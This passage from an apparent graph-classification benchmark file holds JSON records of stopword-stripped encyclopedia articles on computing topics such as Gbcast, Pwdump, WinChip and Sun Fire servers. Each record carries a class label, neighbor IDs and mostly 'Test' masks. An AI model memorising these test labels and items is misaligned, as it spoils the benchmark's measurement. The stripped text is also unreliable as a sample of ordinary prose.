windows linux solaris hpux i5os mac os x port cvs split separate project named cvsnt current active development relationship cvs gnu project long somewhat ambiguous gnu web site distributed program labelling gnu package one page gpl-licensed project another 2008 development cvs transferred old website cvshome.org gnu savannah hosting platform placed non-gnu section gnu ftp download server cvs distributed non-gnu directory time developers created new version control systems based cvs order add features alter operational model improve developers productivity cvs replacement projects include cvsnt first released 1998 subversion initially released 2004 evs first released 2008",
    "neighbors": [
      2689,
      260,
      9223,
      5768,
      10631,
      6154,
      1932,
      6797,
      6286,
      10764,
      5397,
      3350,
      7702,
      2841,
      8476,
      3744,
      2465,
      5037,
      7983,
      9520,
      817,
      4402,
      4919,
      823,
      6525,
      6338,
      10950,
      9671,
      5833,
      4171,
      5969,
      6993,
      6100,
      7895,
      9177,
      11357,
      863,
      487,
      5738,
      10478,
      7409,
      7666,
      8434,
      5492,
      2809,
      9978,
      9724,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1669,
    "label": 3,
    "text": "Gbcast:gbcast gbcast also known group broadcast reliable multicast protocol provides ordered fault-tolerant all-or-none message delivery group receivers within network machines experience crash failure protocol capable solving consensus network unreliable processors used implement state machine replication gbcast used standalone manner support virtual synchrony execution model case gbcast normally used group membership management faster protocols often favored routine communication tasks introduced 1985 gbcast first widely deployed reliable multicast protocol implement state machine replication dynamically reconfigurable membership although problem treated theoretically various models prior work gbcast innovated showing multicasts used update replicated data within state machine also used dynamically reconfigure group membership evolve permit members join leave addition removed upon failure functionality together state transfer mechanism used initialize joining members represents basis virtual synchrony process group execution model term state machine replication first suggested leslie lamport widely adopted publication survey paper written fred b. schneider model covers system deterministic object state machine replicated way series commands applied replicas fault-tolerantly reconfigurable state machine one vary membership adding new members removing old ones state machine protocols also ride temporary unavailability subset current members without requiring reconfiguration situations arise including gbcast also paxos lamport widely cited protocol state machine replication state machine replication closely related distributed consensus problem collection processes must agree upon decision outcome winner election particular shown solution state machine replication problem would also capable solving distributed consensus consequence impossibility results distributed consensus apply solutions state machine replication problem implications finding discussed liveness gbcast somewhat unusual solutions state machine replication problem closely integrated application replicated gbcast contrast designed multicast api implemented library delivers messages group members lamport malkhi zhou note reliable multicast protocols durability properties required correctly implement state machine model gbcast exhibit necessary properties gbcast protocol first described 1985 publication discussed infrastructure supporting virtual synchrony model isis toolkit additional details provided later 1987 journal article open-source version protocol released cornell developers november year isis used protocol primarily maintaining membership process groups also offered api could called directly end-users technology became widely used starting 1988 isis system commercialized support became available commercial support system ended 1998 stratus computer parent isis distributed systems refocused purely hardware solutions telecommunications industry examples systems used isis production settings include new york stock exchange employed approximately decade manage configurable fault-tolerant self-healing reporting infrastructure trading floor relay quotes trade reports back office systems used exchange overhead display french air traffic control system continues use isis since 1996 system employed create fault-tolerant workstation clusters use air traffic controllers reliably relay routing updates air traffic control centers time french technology also adopted european atc systems us navy aegis used isis since 1993 support reliable self-healing communication infrastructure isis also several hundred production users financial telecommunications process control scada critical infrastructure domains details found fundamental problem solved gbcast given initial set group members wish support multicast abstraction permitting members group send messages encode various commands requests protocol must agree messages deliver ordering member group delivers message every member group n't fail deliver message order respect delivered messages set group members changes time member fails joins gbcast also used maintain group membership means special multicasts delivered application new view events also adjust group membership list maintained gbcast protocol library application thus sees series membership views start initial view particular group member joins evolve time ordered respect view-changing events multicast messages multicasts delivered non-failed members listed view delivery scheduled property referred virtual synchrony network partitions split group two disjoint subgroups creating risk split brain behavior group members take decision perhaps launch rocket without knowing partition group taken different conflicting decision gbcast offers protection threat protocol ensures progress occurs single primary partition group thus network partition arise one subgroup members continue operations certain stall shut failed member recover partitioning failure caused member incorrectly sensed faulty hence dropped view communication restored member rejoin incarnation number used avoid ambiguity counter incremented time process joins group treated part process identifier given processor-id process-id incarnation-number tuple joins group remains group fails forced leave time occurred dynamically reconfigurable system including gbcast paxos enter states progress possible example could happen operational processes wrongly removed configuration many real crashes occur within remaining members view situations data center management infrastructure responsible restarting entire application contrast behavior non-reconfigurable vanilla paxos tolerate disruptions unlimited duration resume enough group members accessible without intervention management infrastructure following terms used detailed protocol description weak assumptions network never delivers messages would satisfy would say network experiencing complete permanent partitioning failure network conditions required gbcast guarantee progress discussed practice gbcast normally used within data centers networks experience transient failures partitioning failures rare generally impact small subsets nodes thus purposes analysis assume harsher networking environment would arise actual deployments simplify presentation assume tcp-like acknowledgement retransmission scheme employed creating illusion reliable sequenced non-repeating message channel pair processes timeout occurs channel abstraction retries repeatedly unable obtain acknowledgement message using tcp-like channels also support 1-to-all capability whereby single process sends message channels members view group done mapping 1-to-all request multiple 1-to-1 messages notice 1-to-all channels lack atomicity guarantee sender fails message sent might reach destinations gbcast best understood terms set roles quorums used guarantee safety properties gbcast ensuring single globally agreed-upon sequence group views multicast messages preventing progress one partition group becomes fragmented two partitions disjoint subsets members communicate members subsets members subsets quorums defined specific view given view n members b c… quorum view majority subset members view notice contrast way term defined systems static underlying membership gbcast quorum size change time membership group changes new views become defined order guarantee safety gbcast defines three safety properties ensures hold regardless pattern failures protocol one used normal conditions recall gbcast operational process current view view defines leader process believes leader current view initiate new multicast members must relay multicasts sending leader 1-to-1 connections waiting leader run protocol leader fail member leader attempting relay multicast sender must determine status pending request accomplished follows notice members observe delivery multicasts accordingly new view becomes defined old leader failed either multicast delivered case sender knows one receivers delivery new view allows conclude leader failed relay pending message resent asking new leader relay non-triviality simplest error cases one members fail quorum remains active example group consists b c playing leader role c fails promise phase timeout occurs within reliable channel leader process c. leader therefore commits delivery simultaneously initiates protocol remove c group commits creating new view b c actually failed rejoin group new incarnation number effect c must rejoin c messages c b rejected instant learns apparent failure c shunned b notice commit new proposal piggybacked failure notification combined single message ensures process commits action new failure sensed simultaneously learns failure shun associated process process quickly removed view c n't crashed rejoin incrementing incarnation number named c requesting added back group leader appended membership list new name highest rank youngest member among members view example shown group initially contains members b c asked add e f member c fails protocol membership change requests treated special kind multicast sequence events example thus nearly identical prior one series new view events delivered application end protocol new active view view3= b e f new quorum size 3 notice intermediate view view2= b c e f quorum size 4 leader received 4 promises proposal phase removed c would able run commit phase view3 illustrates basic policy quorum required commit new view always based size prior view next failure case leader fails resulting new leader take leader new leader first runs takeover protocol new leader run basic gbcast takeover protocol follows example complex case leader fails middle commit increases size view example see inquiry iteration action b learns protocol adds e f first phase inquiry hence repeats inquiry time contacting e f. need repeat inquiry c since would simply return information previously obtained example final commit actually causes two views delivered succession members b c. even though two proposals sent concurrently commit view2 requires promise quorum view1 whereas commit view3 requires quorum response members view2 although sending initial views n't explicitly shown diagram joining members n't participate 1.1 protocol n't join group view2 notice members b c pipelining effect arises events associated view2 already proposed even events view1 still committed show gbcast satisfies non-triviality start tracing backwards arbitrary delivery action point client requested corresponding event clearly messages legitimately sent delivered however nontriviality protocol goes must also show messages given member delivered member still live participant view accordingly look case leader initiates multicast fails delivered new leader either discovers pending proposal order view-change event new leader fails discover pending proposal case members new view shun late-arriving incoming message old leader thus either multicast message delivered view sent still pending delivered establish consistency begin analysis case single leader never fails loses connectivity quorum since leader sequences events includes member starting first view contains member members deliver identical messages starting view added system new leader takes inquiry required reach quorum members recent committed view quorum necessarily include least one process received proposal old leader could committed thus new leader learn potentially committed proposal include preflix new proposals follows process delivers event system makes progress every surviving member eventually deliver event order show joining member receive initial view analysis two relevant cases leader n't fail sends initial view eventually reliable channel leader fail member lacks initial view new leader sends view receipt promise-list response inquiry-phase message logical partitioning group impossible shunning rule order commit new view old leader must obtain promises quorum current view new leader taking learn view could become committed commit proposed next view thus required interact quorum intermediary view scenario could lead partitioning leader might timed b gone create sequence new views events excluded b case majority old intermediary view members learned believes b failed shun b inquires either case b prevented obtaining quorum hence make progress symmetric argument shows b succeeds defining new view excludes would unable obtain quorum new view might attempt propose gbcast protocol make progress provided times execution view v holds time less quorum members v fail suspected failing within subset members view maximize progress important excluded still live members rejoin group erroneous failure detections n't cause view shrink persistent manner however protocol recover make progress time every process suspects quorum members current view failed property similar stronger w weakest failure detector achieving consensus defined chandra toueg see consider run mutually suspecting quorum arises quickly processes wrongly excluded view rejoin gbcast make progress indeed group need shut restart arguably runs would unlikely kinds data centers gbcast typically used clearly constructed adversarial manner gbcast protocol presumes probability incorrect failure suspicions low scheme breaks failure suspicions occur frequently operational processes often suspected faulty analogy consider tcp protocol failure receive acknowledgement eventually cause connection break tcp used nearly universally tremendous disruption web would result tcp connections frequently break neither endpoint failed thus timeouts set conservatively similar assumption required systems use gbcast contrast failure detection schemes one explored chandra toueg yield high rates incorrect failure suspicions protocols including paxos able tolerate incorrect failure suspicions without costly consequence whether one approach inherently better beyond scope discussion simply underscore approaches differ gbcast would ineffective timeouts set overly aggressively one extreme scenario worthy mention network partitioning events modern data centers networks often experience events single machine processes becomes transiently partitioned larger pool machines remain connected one another cases treated failures gbcast surviving connected members include sufficiently large number processes majority portion system simply reconfigure exclude disconnected member reconnect rejoin group later partition heals extreme kind partitioning sometimes seen data centers situation network switch might fail causing collection machines perhaps whole rack even entire container become disconnected internet remainder data center cases one could imagine group members begin suspect members gbcast progress case management infrastructure would need relaunch entire application hand large data centers operating systems machines experiencing failure would also shut restarting connectivity restored thus practice restart system unavoidable said protocols paxos could ride outage machines remain operational later regained adequate connectivity transis system explored extensions gbcast protocol permit multiple partitions form make independent progress remerge topic however beyond scope present discussion paxos protocol situation arise two leaders duel proposing different commands slot also occur gbcast normal sequence events one leader takes prior leader failed learns proposals prior leader made inquiry phase repeats proposals extended new ones thus duel content slots arises proposals repeated slots closest situation duel seen old leader become partitioned majority new leader taking unable contact set members obtain required quorum inquire phase new leader may unaware proposals old leader made might still issue reach members new leader n't contact shunning mechanism resolves duels new leader obtained quorum inquire phase also blocked old leader ever achieving quorum new propose might initiate majority members shunning old leader thus proposal missed new leader necessarily proposal n't reach quorum members wo n't reach quorum future moreover members aware proposal shunned new leader since gave waiting respond inquire considers failed member learning new proposals new leader shun well shunning leaders gbcast occurs pre-determined order leader ranks higher-ranking leader shuns lower-ranking leader tries take-over place paxos ballots mechanism serves precisely purpose differs allowing participants attempt take-over repeatedly eaach time assuming new ballot rank result one one hand paxos leader demotion reversible dueling leaders could theoretically continue forever although superficially quite different upon close study gbcast seen surprisingly similar paxos indeed paxos transformed gbcast following reversible sequence steps brevity describe steps informally omit detailed proof note transformation address durability gbcast treats durable state property application protocol whereas paxos logs events set durable command logs hence still recover state even whole service shut restarted equivalent behavior gbcast involves application log received messages case considered quorum mechanisms define paxos including inquiry used new paxos leader takes seen correspond precisely steps gbcast ballot mechanism generally viewed hallmark paxos protocols reduces counter tracks order succession leaders simplification fundamentally due guarantee leader suspected removed view would need rejoin participating protocol follows gbcast paxos transformed without changing assumptions identical correctness properties obviously protocols n't look similar deep connection indeed one make stronger claim sequence delivery events exhibited gbcast also arise run paxos vice versa sequence learned events paxos also arise run gbcast type proof outlined formally called bi-simulation one shows input-sequence output-behavior pair one protocol exhibit also possible protocol notice carrying bisimulation features one protocol supports lacks ignored considered part behavior studied example gbcast reporting new views events paxos lacks treated output events paxos gbcast subject flp impossibility result thus neither protocol guaranteed live possible conditions best talk conditions liveness guaranteed expressed predicates failure detection mechanism condition liveness holds protocol live liveness conditions basic paxos gbcast similar identical gbcast progress never resume circle mutual suspicions arises noted quorum mutually shunning processes arises shunning mechanism makes impossible leader obtain quorum promises unmodified paxos protocol problem arise excessive level mutual suspicions ends progress resumes thus paxos makes progress failure-detection mechanism satisfying w condition even periods arise quorum mutual suspicions occur example start group containing a.b c cause extended network partition paxos would resume network partition resolves gbcast shut permanently form management infrastructure may need restart system necessary preserve group state across failure infrastructure would identify last member fail restart group using form checkpoint stored last member paxos deployments common require human operator intervention reconfigure paxos settings gbcast may able make progress period paxos suppose group membership slowly drops less quorum original group size gbcast continue operate even single member paxos would cease make progress periods less quorum view active systems isis implement gbcast typically provide state transfer mechanism instant new view showing joining member delivered existing member makes checkpoint copy group state copied new member loads checkpoint initial group state instant joined various out-of-band copying schemes used pre-load state prior join cases state large transfer last moment way state transfer needed gbcast member dropped group longer receive updates gbcast typically used applications maintain state memory apply updates one one received hence gap arises replica longer useful notice contrast paxos protocol gaps arise consequence basic quorum update scheme n't guarantee every member see every update run unreliable message passing layers might never deliver messages paxos learner algorithm reads multiple histories combines fill gaps thus paxos normally ride transient failures continuing operate without actually dropping failed member group failed member misses updates yet state transfer needed unless group reconfigured gbcast protocol published early period several state machine protocols capable managing membership introduced gbcast view-stamped replication oki liskov basic paxos lamport partial synchrony protocol dwork lynch stockmeyer etc among gbcast first published papers appeared 1985 1987 others published starting 1988 one could thus argue gbcast really first paxos protocol statement however treats paxos fairly broad term covering family protocols implement state machine replication support dynamic reconfiguration membership identical correctness properties vary liveness conditions definition gbcast paxos protocol equivalence formalized using bisimulation run one protocol exhibit also exhibited assumptions made conditions progress identical comparison becomes complex definition gbcast paxos protocol although exhibit runs viewed purely terms requests application notifications application similar identical liveness conditions however sort stringent definition poses different problem one adopts versions paxos paxos protocols example cheap paxos vertical paxos bisimulation-equivalent basic paxos thus question answer unless one makes specific different answer depending upon definition equivalence one uses",
    "neighbors": [
      121,
      7499,
      11612,
      1197
    ],
    "mask": "None"
  },
  {
    "node_id": 1670,
    "label": 2,
    "text": "Androidland:androidland androidland first android retail store opened carrier telstra bourke street melbourne australia december 2011 proves successful may expand within country internationally store themed heavily green featuring several android “ green robot “ sculptures store telstra provides visitors interactive spaceship zone features flight simulator via google earth software liquid galaxy set-up also including massive screen visitors play angry birds features scented areas gingerbread grass aromas called “ android grass “ immerse visitors androidland development since july 2011 google australia helped train store ’ android experts able assist visitors current devices help new ones recommend apps install logan booker writing gizmodo australia wrote “ ’ friendly environment definitely make switch android ’ sure stop aid decision-making interesting fusion business “ experience ” beyond product demonstrations gives shop-within-a-shop corporate powerhouse museum feel. “",
    "neighbors": [
      4995,
      5892,
      5637,
      7428,
      9610,
      2828,
      5262,
      8719,
      3600,
      10129,
      5522,
      1427,
      7700,
      10645,
      280,
      10009,
      10393,
      7835,
      9244,
      10525,
      798,
      11294,
      288,
      673,
      2978,
      2852,
      8486,
      1191,
      1959,
      937,
      1578,
      5546,
      6057,
      5677,
      7595,
      8870,
      10537,
      3380,
      5431,
      1083,
      2875,
      3900,
      10045,
      196,
      69,
      6212,
      8262,
      11082,
      8907,
      332,
      4685,
      3664,
      2001,
      3409,
      8019,
      2901,
      8280,
      5467,
      8285,
      8413,
      479,
      9949,
      2658,
      3940,
      1255,
      1516,
      5100,
      5613,
      8940,
      5620,
      11252,
      7548,
      2045,
      11391
    ],
    "mask": "None"
  },
  {
    "node_id": 1671,
    "label": 4,
    "text": "Pwdump:pwdump pwdump name various windows programs output lm ntlm password hashes local user accounts security account manager sam order work must run administrator account able access administrator account computer hashes dumped pwdump could said compromise security could allow malicious administrator access user passwords initial program called pwdump written jeremy allison published source code 1997 see open-source since developments programmers",
    "neighbors": [
      7754,
      5003
    ],
    "mask": "Test"
  },
  {
    "node_id": 1672,
    "label": 9,
    "text": "Van_Wijngaarden_grammar:van wijngaarden grammar computer science van wijngaarden grammar also vw-grammar w-grammar two-level grammar provides technique define potentially infinite context-free grammars finite number rules formalism invented adriaan van wijngaarden define rigorously syntactic restrictions previously formulated natural language despite essentially syntactical content typical applications treatment gender number natural language syntax well-definedness identifiers programming languages example one person two people grammatically correct one person incorrect context-sensitive reasons w-grammar could represent technique used developed definition programming language algol 68 example larger class affix grammars w-grammar consists finite set meta-rules used derive possibly infinitely many production rules finite set hyper-rules meta-rules restricted defined context-free grammar hyper-rules restrict admissible contexts upper level essentially consistent substitution used derivation process equivalent unification prolog noted alain colmerauer example assignment codice_1 valid variable x contain integer therefore context-free syntax codice_2 incomplete two-level grammar might specified context-sensitive manner codice_3 codice_4 could production rule codice_5 possible production rule also means assigning incompatible types becomes syntax error caught compile-time similarly allows codice_6 codice_7 codice_8 prior algol 68 language algol 60 formalised using context-free backus–naur form appearance new context-sensitive two-level grammar presented challenge readers 1968 algol 68 final report subsequently final report revised wijngaarden colleagues published 1973 algol 68 revised report grammar algol 68 officially defined two-level van wijngaarden grammar subset done one-level backus–naur form compare program open symbol standard prelude program strong void new closed clause yo-yo parser van wijngaarden grammars example grammars expressions eva sal pascal actual iso 7185 standard pascal uses extended backus–naur form w-grammars based idea providing nonterminal symbols context-free grammars attributes affixes pass information nodes parse tree used constrain syntax specify semantics idea well known time e.g donald knuth visited algol 68 design committee developing version attribute grammars quite peculiar w-grammars strict treatment attributes strings defined context-free grammar concatenation possible operation attribute grammars attributes data type kind operation applied introduction algol 68 report w-grammars widely considered powerful unconstrained practical partly consequence way applied revised algol 68 report contained much readable grammar without modifying w-grammar formalism meanwhile became clear w-grammars indeed powerful describe precisely recursively enumerable languages makes parsing impossible general undecidable problem decide whether given string generated given w-grammar use must seriously constrained used automatic parsing translation restricted modified variants w-grammars developed address e.g anthony fisher written parser large class w-grammars dick grune created c program would generate possible productions 2-level grammar applications eags mentioned effectively regarded applications w-grammars since eags close w-grammars w-grammars also proposed description complex human actions ergonomics",
    "neighbors": [
      512,
      10560,
      1956,
      7876,
      8262,
      8421,
      1610,
      1611,
      2316,
      3277,
      2798,
      8524,
      6160,
      9294,
      7634,
      1269,
      4025,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1673,
    "label": 9,
    "text": "Rosetta_Code:rosetta code rosetta code wiki-based programming chrestomathy website implementations common algorithms solutions various programming problems many different programming languages rosetta code created 2007 michael mol site content licensed gnu free documentation license 1.2 though components may dual-licensed permissive terms rosetta code web repository illustrates desired functionality implemented differently various programming paradigms task accomplished different programming languages rosetta code rosetta code site organized browsable cross-section tasks specific programming problems considerations computer programming languages task page displays visitor-contributed solutions various computer languages allowing viewer compare language approach task stated problem task pages included per-language listings based languages provided solutions task solution c programming language appear listing c. task solution ruby task appear listing ruby well computer programming languages found rosetta code include complete list computer programming languages examples entries/solutions rosetta code tasks available tasks found rosetta code include",
    "neighbors": [
      515,
      3462,
      8582,
      2062,
      22,
      5783,
      1435,
      9245,
      7326,
      3876,
      5031,
      428,
      5165,
      5677,
      692,
      8502,
      6074,
      7355,
      6718,
      3904,
      8644,
      5703,
      5833,
      1610,
      1611,
      8524,
      7889,
      2519,
      11610,
      7392,
      10083,
      4840,
      2666,
      8554,
      2670,
      10739,
      3960,
      3705,
      7292,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1674,
    "label": 8,
    "text": "Orb_(software):orb software orb freeware streaming software enabled users remotely access personal digital media files including pictures music videos television could used internet-enabled device including laptops pocket pc smartphones ps3 xbox 360 wii video game consoles 2013 orb networks inc. announced acquired strategic partner would shutting operations also 2013 co-founder luc julia indicated orb networks technology acquired qualcomm accompanying press release issued orb website accessed may 2014 announced ... year ago orb team technology acquired qualcomm connected experiences inc. orb networks longer offering orb software downloads support web based products orblive mycast statement invited people check qualcomm allplay media platform specify orb software may utilized orb available windows media center pcs users create online account remotely access computer music pictures video files stored home computer made available streaming provided computer connected internet media files transcoded streamed directly pc available download use file explorer plug-in current version orb used replacement microsoft windows media connect software computers running windows operating system allows xbox 360 playstation 3 consoles access videos audios images computer orb installed natively allows user also watch videos windows media video format without previously re-transcoded videos orb transcode video files computer fly requested long computer running orb correct codec tv tuner card installed pc live tv also available streaming furthermore orb offers dvr functionality like tivo one schedule tv recordings stream recorded video files remotely via web-based interface true webcam also webcam surveillance feature orb also allows user share photos videos without upload online service one select files one wants share enter email address person access data person receive email link view files orb supports streaming windows media realplayer 3gp flash format supporting wide range 3g cell phones including iphone orb detect type device used adapt stream according player availability network quality example nokia n80 orb use native web browser realplayer device used connect local network pc orb running connect directly stream pc without going internet provided firewall blocks connection provides much higher bit rate quality streaming inside lan orb 2.0 beta ajax-based offers home page similar google personalized homepage netvibes organized tabs tab containing user-defined modules tv guide personal media files rss/atom feeds youtube videos local weather forecast etc ... similar solutions synology slingbox require pc comes hardware another similar solution remote access ifunpix additionally includes tools create upload content personal mini-site support video well audio music unlike orb ifunpix uses proxy storage server user home computer help prevent attacks source computer ifunpix able stream live television also tversity another freeware program much like orb similar solution remote access via mobile younity well orbweb.me products enable mobile access digital files computer",
    "neighbors": [
      9732,
      9863,
      8937,
      1802,
      1674,
      5612,
      6058,
      6797,
      7983,
      3664,
      7602,
      1107,
      4147,
      5143,
      823,
      4219,
      8124,
      10270
    ],
    "mask": "Test"
  },
  {
    "node_id": 1675,
    "label": 3,
    "text": "Sun_Fire_15K:sun fire 15k sun fire 15k codenamed starcat enterprise-class server computer sun microsystems based sparc v9 processor architecture announced september 25 2001 new york city superseding sun enterprise 10000 general availability january 2002 last shipped may 2005 sun fire 15k supported 106 ultrasparc iii processors 1.2 ghz 72 ultrasparc ivs 1.35 ghz installed across 18 system boards uniboards containing cpu sockets ram slots ultrasparc iii sun supported 17 dual-socket maxcpu processor cards place i/o mezzanine cards configuration supported ultrasparc iv maximum physical ram per system 576 gb maximum 72 pci i/o slots available system divided maximum 18 secure independent domains separate machine filesystems root password ability run different versions solaris e15k along enterprise sun servers dynamic reconfiguration feature administrators could dynamically change assignment ram processors different domains meet changes business needs addition 15k contains two system controllers duplicated redundancy embedded sparc computers running solaris used manage 15k perform tasks booting shutting domains assigning uniboards domains 15k contains minimal storage system controller boot disks connected via san separate storage array sun fire 12k codenamed starkitty reduced configuration version 15k introduced april 2002 supported maximum 52 processors intended fill position sun server product line 15k sun fire 6800 sun fire e25k codenamed amazon 25 e denoting enterprise announced february 2004 base cabinet identical 15k difference two systems processor boards installed reached end-of-life january 2009 superseded sun sparc enterprise m9000 server e25k supports 72 dual-core ultrasparc iv+ processors 1.95 ghz ultrasparc iv-based 15k systems maxcpu option offered e25k systems overall system bandwidth claimed 172.8 gb/s aggregate 115.2 gb/s peak 43.2 gb/s sustained overall i/o bandwidth 35.8-gb/s sustained 64 gb ram per board possible maximum 1.15 tb ram single domain 72 hot swappable pci-x i/o slots 54 slots 90 mhz 18 slots 33 mhz also supports 10/100 baset ethernet gigabit ethernet ultrascsi lvd hvd atm fc-al hsi sci",
    "neighbors": [
      6464,
      9665,
      10090,
      1707,
      3247,
      6003,
      11636,
      597,
      1399
    ],
    "mask": "Test"
  },
  {
    "node_id": 1676,
    "label": 2,
    "text": "Windows.h:windows.h windows.h windows-specific header file c c++ programming languages contains declarations functions windows api common macros used windows programmers data types used various functions subsystems defines large number windows specific functions used c. win32 api added c programming project including windows.h header file linking appropriate libraries use functions xxxx .dll program must linked xxxx .lib lib xxxx .dll.a mingw headers associated .dll static library e.g scrnsave.h needs scrnsave.lib number child header files automatically included windows.h many files simply included self-contained dependencies windows.h may include following header files several macros affect behavior windows.h",
    "neighbors": [
      9441,
      4836,
      6180,
      3916,
      6797,
      9196,
      10029,
      8976,
      9813,
      8473,
      5754,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1677,
    "label": 3,
    "text": "WinChip:winchip winchip series low-power socket 7-based x86 processor designed centaur technology marketed parent company idt design winchip quite different processors time instead large gate count die area idt using experience risc processor market created small electrically efficient processor similar 80486 single pipeline in-order execution microarchitecture much simpler design socket 7 competitors amd k5/k6 intel pentium superscalar based dynamic translation buffered micro-operations advanced instruction reordering order execution winchip general designed perform well popular applications n't many floating point calculations included operating systems time majority software used businesses also designed drop-in replacement complex thus expensive processors competing allowed idt/centaur take advantage established system platform intel socket 7 winchip 2 update c6 retained simple in-order execution pipeline predecessor added dual mmx/3dnow processing units could operate superscalar execution made non-amd cpu socket 7 support 3dnow instructions winchip 2a added fractional multipliers adopted 100 mhz front side bus improve memory access l2 cache performance also adopted performance rating nomenclature instead reporting real clock speed similar contemporary amd cyrix processors another revision winchip 2b also planned featured die shrink 0.25 μm shipped limited numbers third model winchip 3 planned well meant receive doubled l1 cache w3 cpu never made market although small die size low power-usage made processor notably inexpensive manufacture never gained much market share winchip c6 competitor intel pentium pentium mmx cyrix 6x86 amd k5/k6 performed adequately applications used little floating point math floating point performance simply well pentium k6 even slower cyrix 6x86 industry move away socket 7 release intel celeron processor signalled end winchip 1999 centaur technology division idt sold via although via branded processors cyrix company initially used technology similar winchip cyrix iii line",
    "neighbors": [
      3459,
      3588,
      5380,
      6151,
      398,
      8851,
      4252,
      6815,
      3883,
      7983,
      8250,
      8125,
      4805,
      10440,
      8523,
      5326,
      473,
      2791,
      9707,
      1260,
      10734,
      1776,
      499,
      630,
      3194
    ],
    "mask": "Test"
  },
  {
    "node_id": 1678,
    "label": 7,
    "text": "KVH_Co._Ltd.:kvh co. ltd. kvh co. ltd. previously known kvh telecom founded fidelity investments 1999 asia-pacific it/communications service provider facility-based optical fiber networks data centers cloud services platform kvh information delivery platform providing integrated communication solutions enterprise businesses kvh serves media manufacturing carrier financial services key customer segments offers customers bilingual support japanese english kvh specializes operating developing low latency networks financial services industry provides low latency connectivity major japanese exchanges kvh fiber backbone features flat network hierarchy media converters network devices making lowest latency network metropolitan japan headquartered tokyo japan kvh also points presence pops osaka hong kong singapore chicago new york sydney seoul busan partner networks europe asia pacific region edward ted higase appointed kvh president chief executive officer representative director may 16 2012 november 12 2014 colt london-based telecom firm announced acquisition kvh kvh part colt group s.a. acquisition combined kvh colt colt group operates 28 countries across europe asia u.s. metropolitan area networks 47 major cities connections 200 cities globally established fidelity investments april 1999 kvh began constructing low latency fiber optic networks tokyo osaka following dot-com crisis 2000 kvh one foreign-owned carriers continued invest business japan 2001 kvh introduced first 2.4 gbit/s leased line services japan opened first data center osaka following year kvh opened second data center japan first tokyo kvh tokyo data center 1 tdc1 tdc1 second largest data center tokyo accompanied launch kvh ethernet services voice tdm services co-location data center operational services within year since kvh expanding portfolio services well presence across asia-pacific region today kvh network extends beyond japan connects chicago singapore hong kong february 2011 kvh opened tokyo data center 2 tdc2 located inzai city chiba 2012 kvh singapore pte ltd. kvh services llc kvh hong kong ltd. kvh korea ltd. established march 2013 kvh launched japan ’ first 100g metro ethernet network service april 2013 kvh expanded business asia pacific launched two data centers hong kong singapore kvh hong kong data center 1 hkdc1 kvh singapore data center 1 sgdc1 10-site cloud platform reaching across europe asia november 12 2014 colt london-based telecom firm announced acquisition kvh",
    "neighbors": [
      4194,
      4429
    ],
    "mask": "Test"
  },
  {
    "node_id": 1679,
    "label": 3,
    "text": "Teenage_Mutant_Ninja_Turtles_(NES_video_game):teenage mutant ninja turtles nes video game teenage mutant ninja turtles 1989 side-scrolling platform game nintendo entertainment system released konami north america published ultra games imprint usa equivalent palcom brand europe/australia alongside arcade game also developed konami one first video games based 1987 teenage mutant ninja turtles animated series released show second season ninja turtles leonardo raphael michelangelo donatello mission retrieve life transformer gun shredder device could restore sensei splinter back human form turtles first objective rescue reporter friend april o'neil held captive bebop rocksteady somewhere city rescuing april turtles must swim underwater disarm series bombs set destroy dam rescue splinter mecha turtle destroy giant mouser find technodrome eventually defeat shredder teenage mutant ninja turtles single-player action game player starts game leonardo switch turtles time pressing start button access information screen information screen shows turtle health whatever special weapon obtained map grid current area messages either splinter april turtle unique primary weapon different speed power reach player current character runs health falls fatal trap run roller car captured enemy forcing player change one remaining turtles player loses game four turtles captured opportunity rescue captured turtle stage beginning stage 3 total six stages game player navigates mission map overhead view travel doors manholes entrances side-scrolling interior levels represent primary gameplay overhead view player move four cardinal directions use primary weapon single type attack game progresses obstacles enemies appear overhead maps side-scrolling levels turtles jump crouch attack either primary weapons jumping walking crouching use one alternate weapons picked along way special weapons include single shurikens throwing stars triple shurikens launches three stars simultaneously spreading pattern boomerangs kiai scroll expands crescent-shaped beam inflicts devastating damage even boss characters items occasionally dropped enemies special weapons obtained limited quantities although boomerangs reused player catches return primary weapon aimed upwards downwards levels specific objective obtaining item defeating boss etc. however levels goal reach exit return overhead map previously inaccessible location player encounters enemy characters acquires weapons special items collects pizza restore health second half stage 2 turtles dive hudson river using underwater version side-scrolling gameplay level turtles must navigate number traps time limit two minutes twenty seconds find disarm eight time bombs game released family computer famicom japan months earlier american nes version title first t.m.n.t product released country predating japanese dub first film animated series subsequent t.m.n.t video games released japan kept franchise original title graphics gameplay virtually identical nes counterpart japanese localization changed plot bit turning april o'neil acquaintance turtles splinter daughter game released teenage mutant hero turtles european territories australian version released series original title australia always used ninja title different box game ported various home computer platforms 1990 including commodore 64 zx spectrum atari st amiga game uk number 1 selling spectrum game 6 months march august 1991 dos amiga versions infamous contain gap impossible cross without cheating glitch also released 2007 wii virtual console released wii europe australia 500 points later raised 600 wii points north america released wii april 2 2007 price 600 points—100 points average nes game—due licensing issue first licensed game appear north american european virtual console due licensing issues later removed wii shop channel japan january 24 2012 north america europe january 26 2012 game mixed reviews gamespot frank provo gave teenage mutant ninja turtles 2.7 10 citing game hard difficulty game unpolished unfun nature reasons rating provo also stated game music upbeat music game general lacks recognizable traits teenage mutant ninja turtles franchise mark birnbaum ign gave teenage mutant ninja turtles 5.5 10 pointing game dated nostalgic hardcore fans birnbaum stated controls poor enemies bland level design characters negatives game sinclair gave game 90 rating praising game colorful cartoonish graphics move sets also criticizing game swimming level game got 3 sequels 1990 1991 1992",
    "neighbors": [
      11477,
      9006,
      2159
    ],
    "mask": "Test"
  },
  {
    "node_id": 1680,
    "label": 7,
